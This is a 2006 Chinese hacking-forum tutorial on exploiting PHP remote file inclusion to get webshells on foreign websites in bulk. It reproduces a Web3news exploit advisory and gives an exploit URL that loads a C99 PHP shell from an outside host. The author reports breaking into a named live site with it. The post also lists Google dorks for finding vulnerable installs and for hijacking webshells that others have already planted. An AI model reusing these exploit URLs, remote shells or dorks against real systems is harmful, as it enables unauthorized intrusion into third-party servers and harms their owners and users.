国外WEB漏洞的利用到社会工程学批量拿Webshell

[原创]国外WEB漏洞的利用到社会工程学批量拿Webshell 信息来源：邪恶八进制信息安全团队（www.eviloctal.com） 文章属性：漏洞利用 原文作者：独孤依人［SST］ 发布时间：2006-09-08 关键字：包含漏洞　社会工程学　Google　hack 注：首发于脚本安全小组(http://www.cnsst.net/)内部交流版块，现友情提交到邪八论坛。写得很随意，旨在给新手朋友对国外WEB漏洞的利用做个引导，学会举一反三，思路扩展。文章虽然简单，转载还望注明出处。 我们先来看看远程文件包含漏洞的原理： 假设http://www.XXX.com/主页文件index.php的代码如下：　　 <? include($page); ?> 由于$page变量缺少充分过滤,没有判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量, 让以web权限执行我们的远程文件. 　 这样我们可以提交: http://www.XXX.com/index.php?page=http://远程服务器/文件名称 我们只要把远程文件设为我们的PHP木马，这样就可以得到一个Webshell。 看完了漏洞的原理，我们来看看相关漏洞的介绍： 进入http://www.cnsst.net/forum/thread.php?fid=20会看到很Remote Include Vulnerability的漏洞公告，随便点击个http://www.cnsst.net/forum/read.php?tid=22看到如下漏洞简介： Web3news <= 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln #===================================================================== #Web3news <= v0.95 (PHPSECURITYADMIN_PATH) Remote File Inclusion Exploit #==================================================================== #                       #Critical Level : Dangerous               #                       #Venedor site : http://www.web3king.com/web3news   #                       #Version : All Versions               #                   #====================================================================== #Bug in : security/include/_class.security.php # #Vlu Code : #-------------------------------- #   <? #     include $PHPSECURITYADMIN_PATH."lang/".$lang.".lang.php"; #   # #======================================================================= # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://SHELLURL.COM? # #Example : http://www.web3king.com/web3news/ ======> Vendor site # #DOrk : allinurl : /web3news/ #====================================================================== #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior =========================================================================== 我们注重看这段代码： #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://SHELLURL.COM? # #Example : http://www.web3king.com/web3news/ ======> Vendor site # #DOrk : allinurl : /web3news/ 简单说下意思： Dork，我们常说的Google的关键字，也就是说我们只要在Google搜索allinurl : /web3news/，就可以得到些有漏洞的URL。 Example，他给举的一个例子，也就是说如果URL符合http://www.web3king.com/web3news/ 这个格式，我们就可以来利用它。 Exploit，溢出过的朋友可能就很清楚了，也就是我们常说的EXP，在这里的意思是把http://sitename.com/[Script Path]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://SHELLURL.COM?中的http://sitename.com/[Script Path]/换成http://www.web3king.com/web3news/（我们找到有漏洞的URL）即可得到一个Webshell，当然得先准备一个SHell放到远程机器上，我已经准备好了一个C99修改版的PHPSHell，连接：http://www.cnsst.net/99.txt 好了，大概明白了利用的过程，我们现在就去入侵吧。 首先进Google搜索关键字：allinurl : /web3news/，会看到很多连接，很多都被人利用了，好不容易找了一个http://www.geipeg.com/web3news/来做演示，我们直接在他的URL后面加上EXP代码得到http://www.geipeg.com/web3news/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://www.cnsst.net/99.txt?，然后提交就得到一个Webshll如图（1）： http://www.cnsst.net/99.txt是我们事先上传好的PHPshell。文件包含漏洞大概利用过程就这样了，这个web3news漏洞现在被得利用得差不多了，大家可以测试下其它的相关漏洞，我测试了几个最新都成功了。 在上面我们利用的C99的PHPshell，这是一种免登录的PHPSHELL，在搜索的时候，我发现很多都被老外利用了，这个马在国外也比较流行，所以我当时就想通过搜索C99的PHPshell的关键字或许可以得到些Shell，于是总结了下关键字，在Google搜索： "php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl" 很多都失效了，但还是找到了一个如图（2）： 点击进去，果然是一个C99的PHPShell，如图（3）： 结果不是很理想，但至少证明这种方法是可以得到Webshell的，可能是我的关键字总结得不好，于是又观察了下C99的Shell， 看到很多C99的SHell标题后有- phpshell，好了，这样我们可以构造“intitle:.com - phpshell”关键字，我们去Google搜索下，果然不出所料，第一页就弄了好几个，当然我们还可以把com改成net,org,cn,jp,at等。 既然C99的PHPshell可以用Google去搜索，那其它的SHell呢？当然是可以了，于是我又想到了去搜索些国外比较流行的PHPSHell，我就拿R57shell为例，直接在Google搜索关键字：intitle:r57shell +uname，剩下的大家都知道，我也不说了。 没有什么技术可言，重要的是思路，希望大家学会举一反三，有时会得到意想不到的结果。 图1 图2 图3

脚本安全小组www.cnsst.net 欢迎你的到来

[楼 主] From:海南省海口市/儋州市电信 | Posted: 2006-10-21 07:18